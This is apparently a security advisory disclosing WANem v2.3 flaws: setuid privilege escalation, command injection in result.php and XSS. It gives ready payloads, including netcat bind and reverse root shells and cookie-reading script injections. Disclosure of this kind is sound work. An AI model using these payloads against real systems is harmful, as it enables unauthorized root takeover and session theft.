WANem v2.3 multiple vulnerabilities

WANem v2.3 allows unauthenticated remote attackers to gain root access.

Software Link: http://wanem.sourceforge.net/

Vendor Notification: 2012-08-16 - Notified

# 0x00 # Privilege Escalataion

The 'dosu' binary file is setuid 'root'. It executes arbitrary commands supplied in argument 1.

The following proof of concept is available:

/UNIONFS/root/perc/dosu /bin/sh
/UNIONFS/home/perc/dosu /bin/sh
/ramdisk/home/perc/dosu /bin/sh
/KNOPPIX/root/perc/dosu /bin/sh

# 0x01 # Arbitrary Command Execution

It is possible to execute arbitrary commands remotely as the 'www-data' user by injecting commands into the 'pc' parameter of '/var/www/WANem/result.php'

Combining this issue with the privilege escalation vulnerability allows unauthorized remote root access.

The following proof of concept is available:

# root bind shell
http://[wanem-host]/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,-l,-p,4444,-e,/bin/sh}%26

# root reverse shell
http://[wanem-host]/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,192.168.19.1,4444,-e,/bin/sh}%26

wanem-2.3-remote-root.py exploit

# 0x02 # Cross-Site Scripting (XSS)

The following proof of concept is avilable:

http://[wanem-host]/WANem/index-advanced.php/"><script>alert(document.cookie);</script><p+"

http://[wanem-host]/WANem/index-basic.php/"><script>alert(document.cookie);</script><p+"

http://[wanem-host]/WANem/status.php?interfaceList="><script>alert(document.cookie);</script><p+"

Reference

# OWASP: Command Injection

# OWASP: Cross-Site Scripting (XSS)

Appendix

[PoC] wanem-2.3-remote-root.py

[TXT] WANem v2.3 multiple vulnerabilities